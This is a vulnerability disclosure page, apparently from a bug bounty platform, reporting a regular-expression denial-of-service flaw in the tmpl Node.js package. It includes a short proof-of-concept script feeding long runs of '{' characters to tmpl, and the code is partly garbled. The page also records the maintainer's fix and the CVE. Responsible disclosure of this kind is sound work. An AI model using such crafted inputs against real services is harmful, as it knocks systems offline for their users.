Inefficient Regular Expression Complexity in daaku/nodejs-tmpl


Reported on

Sep 4th 2021

✍️ Description

It allows cause a denial of service when formatting crafted string.

πŸ•΅οΈβ€β™‚οΈ Proof of Concept

// PoC.js
var tmpl = require("tmpl")
for(var i = 1; i <= 50000; i++) {
       var time =;
       var attack_str = ""+"{".repeat(i*10000)+"answer";
        tmpl(attack_str, { answer: 42 })
       var time_cost = - time;
       console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")

πŸ’₯ Impact

This vulnerability is capable of exhausting system resources and leads to crashes.


We created a GitHub Issue asking the maintainers to create a 2 years ago
Yeting Li submitted a
2 years ago
2 years ago


Hey Yeting, I've just contacted the maintainer about this report for you. Good job!

We have contacted a member of the daaku/nodejs-tmpl team and are waiting to hear back 2 years ago
2 years ago


Seems reasonable. I pushed a fix in v1.0.5. Thanks for the report.

Yeting Li
2 years ago


Thank you for your information @admin and thank you for your confirmation @daaku

Jamie Slome
2 years ago


@daaku - are you able to mark as valid and confirm fix, so that the researcher gets rewarded for their efforts!

daaku validated this vulnerability 2 years ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
daaku marked this as fixed with commit 4c654e 2 years ago
Yeting Li has been awarded the fix bounty
This vulnerability will not receive a CVE
Jamie Slome
2 years ago


CVE published! πŸŽ‰

Ref: CVE-2021-3777

Yeting Li
2 years ago


Thanks a lot!πŸ˜„

to join this conversation